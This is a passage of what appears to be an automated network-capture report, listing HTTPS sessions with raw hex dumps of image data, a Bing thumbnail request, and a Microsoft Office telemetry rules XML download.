2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 8a 28 88 31 d7 ad 3b ec fe fc d6 9a 41 8c 63 9f c2 9f f6 71 e9 51 ed 4d 3d 92 33 16 df 3c 11 cd 4a 2d 8f ff 00 ae b4 a3 b6 f4 1c 7d 2a 61 6c 3f 01 da a5 d5 29 53 46 3b db 7c 9d 2a ab 5a 92 dc 0e 2b a4 36 c0 af 4f c6 a2 16 58 6c ed fa 52 55 9a 07 45 33 08 59 b0 e9 e9 48 f6 6c 3d ab a0 16 a3 6f 02 91 ac f2 bf 77 8a 7f 58 61 ec 22 73 37 16 e4 76 38 a8 1e 13 b7 ff 00 ad 5d 2c f6 59 e8 2a a4 9a 79 dd 92 0d 6b 1c 42 32 96 1c e7 5e 06 dd f7 73 8a 4f 29 87 5a df 6b 1e 9c 71 48 74 f0 17 ee d6 bf 58 46 5f 55 66 12 c0 4f 4a 55 b7 35 b6 b6 38 ed 4e 16 5f ec e6 8f 6e 83 ea e6 30 b7 f9 71 ed 4f 4b 7c e3 8a d9 16 5f 36 31 52 25 a6 3b 76 a9 75 ca 58 7b 18 eb 6d 95 e9 c5 48 96 a7 af 7c 56 c4 76 99 ed 52 47 67 96 e0 60 d4 3a c5 aa 28 c8 8e d8 f5 c7 7e d4 f1 69 9e ab 8e f5 Data Ascii: (1;AcqQM=3<J-}al?)SF;\|Z+6OXlRUE3YHl=owXa"s7v8],Y*ykB2^sO)ZkqHtXF_UfOJU58N_n0qOK\|_61R%;vuX{mH\|VvRGg`:(~i
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: a2 75 63 d8 c8 f3 a5 89 7e f9 cf a5 31 9e 69 32 42 e0 1c 1c 9a d9 36 f0 9e a3 04 7a 52 2c 11 06 e0 74 a2 cc 9e 78 f6 32 94 4c 39 fb bd 39 00 50 16 40 d9 60 c7 9f 61 5a e2 38 fb 7f f5 e9 db 13 81 ff 00 ea a3 94 3d a2 ec 62 c9 6c d3 e0 b9 95 57 d8 d2 2e 98 9b 71 e7 ca 07 a1 ad ad ab d3 6f 14 a5 40 ee 31 45 87 ed 4c 88 34 d4 0d f3 16 3f 8f 35 76 0b 38 95 86 32 3d f2 6a c8 45 0d 93 83 8a 5d d1 2f 27 85 03 24 fb 0e b4 13 2a 8d 9e 63 e1 8f 88 7e 6f 8e 35 4b 2d 66 ee da d7 4c 80 48 60 71 91 86 56 00 00 47 2d 91 93 8c 57 a3 68 77 d6 7a 9e 9b 15 fe 9f 70 27 b6 9d 49 8e 45 ce 08 07 07 af 39 06 be 5c f1 04 b1 bf 88 2f 64 87 88 da e1 ca 8c f4 52 4e 31 f8 57 a4 fc 04 f1 ad 96 95 66 da 06 a7 34 8a b3 dc 29 b2 60 a4 a8 67 e0 a9 fe e8 ce 0f d4 9a d3 97 dd 4c d2 ad 3b 5e Data Ascii: uc~1i2B6zR,tx2L99P@`aZ8=blW.qo@1EL4?5v82=jE]/'$*c~o5K-fLH`qVG-Whwzp'IE9\/dRN1Wf4)`gL;^
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: d8 f4 db c9 a6 ff 00 6a a7 4c 9c f5 c6 2b 18 34 9b 77 2b fc df 9f 3f 8d 34 17 3c 6f 00 0e 09 ff 00 11 47 28 5c dc fe d5 8f 68 da 1b 20 81 d3 83 ef 47 f6 b4 01 72 7c dc 13 e9 58 59 63 f3 97 1d 73 ff 00 eb a1 be e9 06 41 c7 3d 78 ff 00 f5 d1 ca 1c c6 f0 d5 20 38 52 65 ce 79 3d 28 5d 52 16 4f 97 cd 24 7b 67 f4 ef 58 04 a9 6f bf 90 3d e9 40 01 b0 1d 72 7b ee a3 95 05 cd ef ed 58 43 63 f7 9d 39 fe 9f fe aa 4f ed 78 83 00 52 4c 1e 99 1c 63 3f 5a c1 dc 03 70 ff 00 30 e7 83 fa d2 07 cf 56 eb eb d3 a5 1c 81 74 74 23 56 85 98 e1 a4 1f 51 d7 f5 e2 9a 75 78 76 03 fb d1 d3 8c 77 ef c9 ac 1d ff 00 30 21 f9 ed ff 00 d6 a3 77 72 e3 ae 47 b5 1c 88 57 36 c6 ad 09 27 31 c8 4f f3 ec 7a 51 fd ab 01 51 91 27 cc 43 11 e9 58 5b 88 e8 e3 24 f5 f4 a5 2e db 40 c8 f6 a3 95 05 cd b1 Data Ascii: jL+4w+?4<oG(\h Gr\|XYcsA=x 8Rey=(]RO${gXo=@r{XCc9OxRLc?Zp0Vtt#VQuxvw0!wrGW6'1OzQQ'CX[$.@
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 19 7b bd 56 22 40 ff 00 57 1b 79 8e 48 f6 19 c7 e3 8a e0 f5 ef 8b 9a 9b dd 15 d2 6d e3 82 03 d1 ee 3e 67 3f 80 e0 67 d2 ae 34 a6 f6 32 a9 88 a7 05 ef 33 d5 05 b9 1c 90 5b 3e df e7 8a a1 ad eb fa 1e 97 20 86 ff 00 51 b6 82 43 92 10 9c b7 b9 20 02 47 e3 5e 2d 7f e3 bf 13 5f a6 db 9d 52 e0 46 47 21 58 22 9f c8 0a c5 96 f9 9f 71 3e 63 3b 83 c8 60 49 cf 5c 92 73 5b 47 0f dd 9c 73 c7 ab 7b ab ef 3d c2 1f 1d f8 49 c9 54 d5 57 00 e3 26 36 5e 79 ef 56 13 c6 5e 18 7c 05 d5 e1 04 f4 dc 08 03 eb 91 5e 02 b2 46 f3 06 92 06 38 e9 90 0e 2a 75 28 32 58 b0 2e 4e 70 08 19 ec 73 57 f5 68 f7 32 fa fc fb 23 de 17 c5 7e 1b 2f f2 6b 36 a1 bb 7a 7f 2a 7c 1e 2b f0 e3 73 fd ad 6e 4f 70 49 19 fa f1 5e 0a 1e 32 c5 c2 10 40 03 fb bf a7 18 a6 01 6d 1b 90 65 56 c9 fb b9 38 eb c5 4f d5 Data Ascii: {V"@WyHm>g?g423[> QC G^-_RFG!X"q>c;`I\s[Gs{=ITW&6^yV^\|^F8u(2X.NpsWh2#~/k6z\|+snOpI^2@meV8O
2024-12-08 12:31:23 UTC	16067	IN	Data Raw: 48 8a 02 a7 3d 73 d6 94 db dc 15 25 50 73 dc f1 8e b9 aa a2 e8 96 24 c7 c8 1c 8a 96 3b b5 2a 33 d4 f5 f7 c7 f9 e9 49 a6 52 9a 64 82 d6 54 50 cf c2 93 93 8e bf e7 f1 ab 11 b2 2b 60 f0 70 47 4e 9e f5 12 df 1d a5 81 c6 78 fb 80 d4 72 dc b3 e4 93 c0 c7 dd c0 fc 79 ac e5 0e 6d ca 85 65 12 d9 98 94 54 04 ed 61 83 cf ad 2e e4 5e 49 cb 6d 20 9e de b8 cf 4f ce a0 8e 65 e0 9c 37 39 e5 40 a1 64 db 90 db 58 73 d4 7f 9c 54 7b 13 65 88 b8 e7 66 9b e7 2b f2 8e b8 18 03 eb 53 ab c5 18 24 61 f9 c6 71 c6 7f a7 15 11 60 cb 90 ea 3b e7 d6 9c 23 63 92 10 67 a9 6f 7a 5e cc 3d b7 52 29 33 23 97 23 91 d4 91 c6 3d 31 50 5c 1c b7 39 00 12 31 8c f4 ff 00 3d ab 4a 38 51 53 0d 1a b1 23 05 4b 71 ed 9e 73 51 5e c6 8c 80 28 8d 58 7d ec 1c ff 00 f5 f1 57 15 66 4c a4 9a 32 58 20 5c 87 24 Data Ascii: H=s%Ps$;*3IRdTP+`pGNxrymeTa.^Im Oe79@dXsT{ef+S$aq`;#cgoz^=R)3##=1P\91=J8QS#KqsQ^(X}WfL2X \$
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: a0 40 07 7e 79 e4 d0 4f ce 47 61 8e a7 8a 17 1b 79 e5 8d 37 71 05 81 1c ae 3f 1e 68 12 15 43 6e dc b9 23 8c e2 92 69 9f c9 28 4e 3b 11 eb 4e 25 8e 09 1b 4f 52 09 cd 41 33 65 81 c7 07 9e 68 02 58 cf cd c1 c0 00 03 8f a7 5a 7b 64 30 1d ba 8e 6a 38 79 6c 9c e4 70 31 ef 4f c1 dd c6 49 e7 df eb 40 74 03 90 d9 3e bc ff 00 86 28 5c 6d 38 e9 f9 53 a3 0b e6 61 f2 54 90 09 1d b2 6b 61 ae f4 a3 a7 b4 32 db c4 8a 41 0a ea 0e f1 ef 9e f4 9b b1 b5 3a 7c e9 eb 63 11 ce 17 9e 31 8f c3 34 8c 49 e3 3d fa fb d4 d3 22 06 cc 4f e6 a9 e5 58 03 c8 aa f2 7c b9 0c 08 27 a0 22 99 8b 4d 32 5b 50 09 de 48 f9 48 e3 8e 7b 54 b3 19 4a e3 66 14 e4 15 5e 3f ce 2a bd be 15 49 3d f1 db f0 e6 9e 24 68 d8 30 e3 04 e7 f1 a0 69 8a 42 95 20 90 a7 b7 04 f5 a8 b1 b1 89 5c e3 d7 b5 29 72 32 49 19 Data Ascii: @~yOGay7q?hCn#i(N;N%ORA3ehXZ{d0j8ylp1OI@t>(\m8SaTka2A:\|c14I="OX\|'"M2[PHH{TJf^?*I=$h0iB \)r2I
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: 37 e3 91 d8 e6 b6 ed 6f b7 3a c4 ea c8 1b 2a 0f 38 e3 b0 15 06 af 6d a2 ea f7 02 e1 35 0f 2a 51 f2 ab 0e 41 c7 4c f7 c8 aa da 7d 8e ad 1d e4 a9 1d c4 37 30 40 32 ce 64 07 e5 07 1e b5 ab 71 97 53 ce 82 ab 49 da d7 4f b1 b7 bd 57 9c c8 cd e9 fe 35 37 98 c5 95 48 da 31 85 ee 71 59 36 37 57 cd 23 c1 2e 9f 2c 6d b3 7a 6d 52 58 29 ef e8 2a 3b bd 47 52 81 8c 51 69 53 33 29 1b ce 0f 00 f4 e4 7a d1 ca cd fe b3 15 ae bf 71 16 ad a5 5d 4f 74 d7 12 ca 0a c5 2e 62 93 80 42 91 92 a4 7d 69 9a 4e a5 34 fa 80 82 09 0c 91 29 da e4 80 0e 47 4c 7b 67 f4 a7 58 df cb 7a f3 db eb 10 a4 4a d9 78 c8 52 08 23 20 e0 8e 98 c5 77 9e 02 f0 04 51 d8 c7 a9 ea 31 b2 c4 72 f1 42 4e d9 27 f7 63 fc 20 8e dd 6b 3c 46 26 9d 08 73 54 62 c2 60 ea 62 ab 2f 61 b7 5f f8 26 2b c5 71 25 9c 82 0b 76 Data Ascii: 7o:8m5QAL}70@2dqSIOW57H1qY67W#.,mzmRX)*;GRQiS3)zq]Ot.bB}iN4)GL{gXzJxR# wQ1rBN'c k<F&sTb`b/a_&+q%v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49746	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:23 UTC	346	OUT	GET /th?id=OADD2.10239385875217_1AS9NW8J4VEXSVA8E&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:23 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 490391 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 49A9EABF6987417E8D7B46D8AB3B9705 Ref B: EWR30EDGE0215 Ref C: 2024-12-08T12:31:23Z Date: Sun, 08 Dec 2024 12:31:23 GMT Connection: close
2024-12-08 12:31:23 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 13 ac 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 36 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 38 3a 31 34 20 30 38 3a 32 36 3a 31 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 24.6 (Windows)2023:08:14 08:26:168
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: ea 80 71 1b a9 18 7a 51 92 29 39 2d 41 3a 08 c2 a2 60 77 54 cd 9a 6b 8c f2 2a 65 b0 d0 88 05 3d 52 98 a3 e6 c5 4a 87 35 50 dc 99 ec 39 69 eb 4d 5c 53 f9 ad cc 04 61 4b 1d 23 50 a7 15 84 b7 3a 61 27 62 5e 69 8c 71 48 cd 9f bb 4d 63 59 bb a3 54 d3 1f 9a 4a 45 34 e5 39 a9 6d 96 ac 19 a9 14 fc b5 1a 8a 7a 11 57 4a 56 66 55 63 74 3f 6e 69 bb 4a d3 d7 9a 7a a8 35 d3 1a ae e7 2c e9 2b 5c 85 73 4e e6 a5 65 14 bb 7e 5a df 98 e6 71 20 6a 4c 7c d5 63 66 69 3c 93 4f 99 13 66 56 c5 2d 4e d0 e2 8f 2b 14 73 a1 a8 b6 44 a3 34 ec 62 9f b7 14 8c 47 7a 9e 71 a8 b1 ab 43 52 b3 0a 8e 59 00 ac 67 51 23 78 53 62 e7 de 9a c6 9b bc 9a 6b 71 5c ee 4c eb 8c 10 3f 34 8c 70 d4 d5 39 a6 3b 1a 9e 64 55 98 f6 61 42 b8 0d f7 aa 07 26 98 ec 45 62 e4 ee 5a b6 c5 ed c2 a4 50 0d 50 b7 90 f7 Data Ascii: qzQ)9-A:`wTk*e=RJ5P9iM\SaK#P:a'b^iqHMcYTJE49mzWJVfUct?niJz5,+\sNe~Zq jL\|cfi<OfV-N+sD4bGzqCRYgQ#xSbkq\L?4p9;dUaB&EbZPP
2024-12-08 12:31:23 UTC	16384	IN	Data Raw: a6 34 7f 35 5a 92 15 99 16 01 a6 3e 3a 1a 9d a2 27 f8 69 9e 43 ff 00 76 9f 32 17 29 59 f6 f4 34 54 c6 da 4d b9 db 45 57 32 21 c5 b2 da 3a 1e 4a d3 b3 15 46 ab f2 d2 32 d7 c3 b9 9f 60 a2 4d 88 cf f1 52 3a 8d bc 55 76 ca d0 8e 0f 15 94 aa 1a c6 93 63 a4 4a 85 90 d4 ce 7f da a6 ed ac 25 3b 9b c5 34 45 b3 bd 47 24 75 6b 1f 2d 23 63 a5 66 f5 35 8c 9a 29 32 62 91 93 2b 56 d9 01 a6 34 75 93 4c d6 33 28 c9 0e 78 a8 1e 2d bf c3 5a 5b 01 eb 51 b4 40 d6 6e 36 36 8d 43 35 a3 a6 b4 39 ab ed 18 dd 4d 68 e9 1a f3 99 53 5b ff 00 b3 54 a6 b7 ad e7 4c f5 aa d7 10 03 54 a4 d1 51 96 a6 04 96 e7 ba d5 3b ab 52 7a 56 ec 90 fc d8 a6 c9 6b b9 6b 45 55 a3 6d 0e 61 22 2b 27 35 7e d9 33 56 e6 b1 c7 34 c4 8b 63 55 4a aa 68 d1 6a 3a 18 f0 d5 6a 31 eb 51 c6 2a c2 0c d7 2c a7 a9 76 1d Data Ascii: 45Z>:'iCv2)Y4TMEW2!:JF2`MR:UvcJ%;4EG$uk-#cf5)2b+V4uL3(x-Z[Q@n66C59MhS[TLTQ;RzVkkEUma"+'5~3V4cUJhj:j1Q*,v
2024-12-08 12:31:24 UTC	16384	IN	Data Raw: a6 31 4f ee d1 b8 55 07 2f 90 ff 00 b4 1a 72 dc 31 a8 b7 0e cb 42 9a 57 0e 55 d8 98 4e f4 34 d2 7f 7a a2 cf bd 19 f7 a6 2e 45 d8 7b 48 df de a4 67 27 ad 36 a3 76 c3 50 52 89 3f be ea 2a 0d f9 5a 29 dc 7c ac f9 87 ec 8f fd da 6a d9 9f ee d7 76 ba 28 6e 36 d4 73 68 a1 5b fd 55 7d 57 f6 ac 7b 9e df d4 e2 71 b1 d9 be da 7a da b8 ae d2 d7 41 12 6e c2 d3 9b c3 af d9 69 7f 6a c7 b8 be a6 8e 27 ec a6 91 ad 4d 76 53 68 45 3e f2 d4 4f a2 c8 5b 85 ab 8e 67 17 d4 9f a9 a3 92 4b 73 fd da 91 6d b3 5d 4a e8 72 f5 db 43 69 12 0f f9 65 4f fb 4a 3d c9 fa a5 8e 61 2d 9e 9f f6 77 15 d3 c3 a4 4a eb f7 69 df d8 f2 0f e0 a9 fe d1 8d f7 0f aa 9c ba c2 e2 a4 44 71 d5 6b a1 7d 2d ff 00 bb 51 49 a6 30 5c ed a3 eb d1 61 f5 76 63 a7 15 22 ca cb d2 af b6 9e ff 00 dd a6 49 a7 c9 d9 69 Data Ascii: 1OU/r1BWUN4z.E{Hg'6vPR?*Z)\|jv(n6sh[U}W{qzAnij'MvShE>O[gKsm]JrCieOJ=a-wJiDqk}-QI0\avc"Ii
2024-12-08 12:31:24 UTC	16384	IN	Data Raw: 70 ff 00 f7 ca d2 34 30 0f e1 a8 5a 79 19 7f 8a a0 79 4d 0a 94 8a f6 88 b3 35 b0 7f f5 55 1f d9 65 35 1c 73 c8 ad 91 56 52 e5 dd 70 6a fd 9c 90 b9 e2 47 f6 70 17 3b b9 a8 2e 6e 7c ae 23 a7 5b df e9 f7 3a 84 96 50 5e 46 d7 51 2e 64 89 5b 95 14 eb cb 8d 3e d9 97 ed f7 96 d1 1f fa 69 20 56 f5 ad 23 49 f5 44 3a 9d 8a 6d 2d c3 b7 1b aa 68 ee 67 8f e4 32 fc d5 8f 7f e3 4d 0a df cc 09 14 f3 95 62 23 58 f0 cb 20 1d f3 d8 55 19 3c 75 a6 7d 9d 8c 1a 44 fe 77 f0 ac 8c 36 fd 4d 6c a8 73 7d 91 73 c8 dc 71 23 48 d2 48 dc d3 56 e2 78 9b 03 f8 6b 98 4f 1c 4a 2c 55 25 d2 23 96 e5 7e f4 8b 26 c4 6f c2 a6 b7 f1 bd a0 b5 fd ee 95 27 9d fc 4a ad f2 56 ea 86 96 68 87 29 9d 0b de ce cc be b5 6f ed b3 c7 0e 4f cc d5 c3 5d 78 c6 f5 e4 63 69 63 6d 00 fe 1d d9 76 5f af 6a a0 fe 21 Data Ascii: p40ZyyM5Ue5sVRpjGp;.n\|#[:P^FQ.d[>i V#ID:m-hg2Mb#X U<u}Dw6Mls}sq#HHVxkOJ,U%#~&o'JVh)oO]xcicmv_j!
2024-12-08 12:31:24 UTC	16384	IN	Data Raw: 14 e3 8f 7f cf 0a ee 6f ee b5 4f e6 5c 45 cf 91 b4 ff 00 bb f2 d3 de 2f 9b 3b b6 ff 00 b4 b4 c5 13 aa e2 36 f3 3f de aa 72 4c d5 24 89 1e 49 5e 35 3b 99 4d 22 f9 ed cf cb 8f ef 6e aa f2 49 8d c2 75 65 0d fd da 10 c6 78 46 92 31 ff 00 7d 51 ca 4c a4 3e e1 e4 49 94 06 5c 7f b5 53 42 e5 f6 a7 9b b8 ff 00 b5 55 64 8c bc 6c 4c fe 61 5f f6 7e 6a 8a 38 cf 4f 37 fe fa a7 ca 9a 33 6d b2 ed c4 4e 24 c7 6f ef 2d 42 f1 46 db b1 f2 95 fe f5 3e dc 4e 38 dd e6 7f c0 aa 45 0f f2 9b 88 b9 5f ee d2 d5 0a c5 0e 57 e4 3b 57 fd da 6e 71 c1 96 b6 91 63 75 cc 71 7f c0 59 6a 39 2d f7 7c c8 8b fe d2 ed a4 ab 6b 61 d9 98 cb 11 76 c0 f9 a9 5a d4 ab 60 f5 ad 2f b3 63 71 f9 97 fd d5 db 50 4d 04 bb 72 25 ff 00 80 b2 d6 8a a5 c4 54 78 71 fc 54 dd 88 38 7a b0 d1 4e 5b 05 55 bf da a4 78 Data Ascii: oO\E/;6?rL$I^5;M"nIuexF1}QL>I\SBUdlLa_~j8O73mN$o-BF>N8E_W;WnqcuqYj9-\|kavZ`/cqPMr%TxqT8zN[Ux
2024-12-08 12:31:24 UTC	16384	IN	Data Raw: 8f da bb 4b 8d 37 e5 cf 99 b9 7f ba d5 9b 79 a1 5d 4f 0e 60 58 f6 b7 f7 5b b5 6f 1c 5c 65 a3 33 39 bd e1 77 1f 95 b7 55 76 64 3c ed db 5a ed a2 5f 95 67 16 cc ca ad 8f 97 e6 e9 55 26 b0 9d 1b 0f 04 8b fe f2 9a e8 8d 48 5b 46 2b 15 a3 30 6e 5a 75 c4 68 63 de 8b c5 48 d1 30 eb fe 71 52 2c 60 c2 c0 2f 2b cd 37 34 3b 14 18 02 df 77 8a 63 ae 7a 74 ab 8a 03 2f dd a7 3c 60 2e 76 f3 5a f3 95 ca 50 d8 e1 71 da 98 ca ff 00 82 d5 b7 84 fd fa 8f cb 7f be 7e 5a d1 49 32 5c 59 0f f0 b5 23 a0 2d 80 d4 f7 42 3a 7f df 54 6c c3 73 45 c9 b1 5e 44 fb d9 a6 2a e7 e9 57 1e 3c af dd a6 3c 2e 3e 95 4a 7a 19 b8 b2 ba 0c 7f 06 ea 56 1b 3a 6e 5a b0 b1 ec 5c d0 a3 72 f3 4f 98 56 20 67 7f 98 16 fb d4 ee 15 70 1b 75 4a f1 fa d3 55 11 5b de 9f 32 2a cc 8d f3 bb 14 e5 52 17 3d e9 70 ff Data Ascii: K7y]O`X[o\e39wUvd<Z_gU&H[F+0nZuhcH0qR,`/+74;wczt/<`.vZPq~ZI2\Y#-B:TlsE^DW<<.>JzV:nZ\rOV gpuJU[2R=p
2024-12-08 12:31:24 UTC	16067	IN	Data Raw: c0 f1 27 83 e5 6b 8b 59 34 3b 3f b3 6d 52 93 ab c8 1b 76 3f 8b f1 ab de 19 bb 97 c3 be 5c f7 9a 7b 32 ab 1f 35 b7 1d bc 75 ce 2b ab 45 2a d1 a9 6d c5 6b 49 52 29 b4 99 6d ee 36 b0 97 86 56 50 77 0f e9 58 4f 30 9c e0 a1 55 5d 7e 26 eb 03 18 be 78 3b 32 83 f8 82 cf 54 d0 db 56 d2 6d a4 49 a2 93 64 96 8c a5 d3 67 69 3c ce 33 9f 4c 55 cb 5b cf 33 61 91 7c ad cb 9d b4 d9 87 91 0e db 58 a3 8a 2f ee c6 b8 a9 1a 7f 3a 35 fb 64 4b 86 fb ac bf 7b f1 ae 29 38 3f 81 68 75 d3 8c 97 c4 ee 2c c5 d3 6b 8f 9a 3f f6 68 1e 5f f1 a3 62 98 ea 63 5e 3e 65 db f2 ed a9 2c ee 50 ae c9 17 ff 00 1d a8 67 44 77 1e a1 11 94 85 fb d5 6a d9 24 96 4c 7c d8 5a 4b 34 47 6d 9b 57 6f f0 d6 9d 9c 66 15 c7 f7 7f bd fc 55 c9 56 a2 89 d5 4e 04 b6 2a 91 47 90 bb 76 fd ea 75 d6 a6 f1 ae 43 6e 15 Data Ascii: 'kY4;?mRv?\{25u+EmkIR)m6VPwXO0U]~&x;2TVmIdgi<3LU[3a\|X/:5dK{)8?hu,k?h_bc^>e,PgDwj$L\|ZK4GmWofUVNGvuCn
2024-12-08 12:31:24 UTC	16384	IN	Data Raw: b4 31 46 91 c6 8d 1b 7f 7a 4c 9c e4 e7 d3 a5 57 f0 dc ad 61 78 b3 ac b2 2f 94 9f 33 45 f7 a3 eb c7 3d ea 6d 4b 4c ba b4 d1 62 9e ed a3 8d 77 10 ab bb e6 ce 71 59 7e 24 d4 50 dd 47 0d 9a ee 86 24 11 f9 91 fc be 66 3b fe 34 e9 c5 4d 38 c3 66 69 29 38 bb c8 d8 fb 6d b9 b8 ff 00 44 83 cf b8 ba dc 3c 89 3e 7f 2f 3c 67 3d db bd 51 ba 32 5c df 7f a4 33 65 17 0c bb 7e ee 2a 1d 2b 58 7b 4b 39 c5 ad 9c 7e 64 aa 07 da 64 5d cf 1f 39 3b 3d 33 d3 e9 4f 8d ef d9 b7 db 7c d2 bf 2c bb 7b 53 f6 6e 0c 89 54 e6 48 a9 76 41 dd 2c 7f 2a af 0b b7 f8 aa 6d 35 cf 98 c1 1b 71 65 f9 97 6d 74 1e 1f b2 b4 5b 1f 32 eb 4a 69 25 78 0b c5 1c 92 71 31 62 54 11 e9 83 4b 67 a5 3a c9 3d a8 b1 91 66 89 09 55 6f bd c7 07 ff 00 1e a8 9e 22 3a c4 5e ca 5a 0f 99 f4 5b 8f 0f b2 5d c1 34 ba 93 c8 Data Ascii: 1FzLWax/3E=mKLbwqY~$PG$f;4M8fi)8mD<>/<g=Q2\3e~+X{K9~dd]9;=3O\|,{SnTHvA,m5qemt[2Ji%xq1bTKg:=fUo":^Z[]4
2024-12-08 12:31:24 UTC	16384	IN	Data Raw: 99 87 91 0b 0d de ed b7 eb 5d 66 b9 e1 c7 92 48 af 23 be 9a e9 57 f8 62 f9 5b f1 15 cf c9 25 93 48 d1 c3 e7 c6 c8 df 3e ec ee fc ab b2 9d 78 d4 57 8e a2 e6 8b 2b b3 21 5d 91 aa a3 7f 13 46 bb 7a 7d 69 88 f1 a6 e3 f7 8f f7 57 f8 a9 75 09 04 2b e6 79 4d 21 ff 00 69 b6 ff 00 fa ea 86 8f fd a1 75 78 d1 44 ca d1 c7 cb 48 be fd b3 5b c6 2d c5 ca fa 10 f6 26 ba d4 52 16 6c 40 b2 32 fd d5 dd b7 8c 77 ac eb c5 bb d4 a3 63 e5 79 4c dc ae ee 51 7f 1a dd 5b 43 6f 23 19 63 59 ff 00 bc cc c3 72 fb 54 17 4d e6 ae 24 8a 66 55 fe 15 6a d2 9d 48 c5 fb ab e6 62 56 f0 dc 77 02 d6 4b 3d 46 d9 6e 47 58 b6 b7 dd ff 00 81 0e 94 6b e2 4f 39 20 8a 3b 6b 78 7a 79 af 8f 97 fd d1 d4 d1 70 f7 a9 6f f6 7b 1b 36 65 ea cd 23 7d ef a9 ac eb 5d 32 e2 f7 56 4f b6 dc c1 1e d6 1b 95 5b 3b 73 Data Ascii: ]fH#Wb[%H>xW+!]Fz}iWu+yM!iuxDH[-&Rl@2wcyLQ[Co#cYrTM$fUjHbVwK=FnGXkO9 ;kxzypo{6e#}]2VO[;s

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	49747	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:23 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:24 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: b569e8fb-501e-008c-5305-48cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123124Z-r1cf579d778kr8xrhC1EWRfkun00000005qg000000005y1g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:24 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.6	49748	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
